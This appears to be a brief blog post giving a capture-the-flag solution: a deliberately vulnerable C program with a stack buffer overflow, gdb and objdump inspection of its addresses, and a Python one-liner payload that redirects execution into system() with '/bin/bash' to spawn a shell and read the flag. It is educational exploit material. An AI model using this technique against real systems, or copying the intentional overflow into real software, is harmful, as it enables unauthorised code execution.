# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
$ cat rop2.c #undef _FORTIFY_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> char * not_used = "/bin/bash"; int not_called() { return system("/bin/date"); } void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256); } void be_nice_to_people() { // /bin/sh is usually symlinked to bash, which usually drops privs. Make // sure we don't drop privs if we exec bash, (ie if we call system()). gid_t gid = getegid(); setresgid(gid, gid, gid); } int main(int argc, char** argv) { be_nice_to_people(); vulnerable_function(); write(STDOUT_FILENO, "Hello, World\n", 13); } $ objdump -t ./rop2 | grep not_ 080484a4 g F .text 00000014 not_called 0804a024 g O .data 00000004 not_used $ gdb ./rop2 (gdb) set disassembly-flavor intel (gdb) x/7i 0x080484a4 0x80484a4 : push ebp 0x80484a5 : mov ebp,esp 0x80484a7 : sub esp,0x18 0x80484aa : mov DWORD PTR [esp],0x804861a 0x80484b1 : call 0x80483a0 0x80484b6 : leave 0x80484b7 : ret (gdb) x/xw 0x0804a024 0x804a024 : 0x08048610 $ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2 cat key i_could_get_used_to_this_rop_thing
cat rop2.c
objdump -t ./rop2 | grep not_
gdb ./rop2
set disassembly-flavor intel
x/7i 0x080484a4
x/xw 0x0804a024
(python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
Post a Comment
No comments:
Post a Comment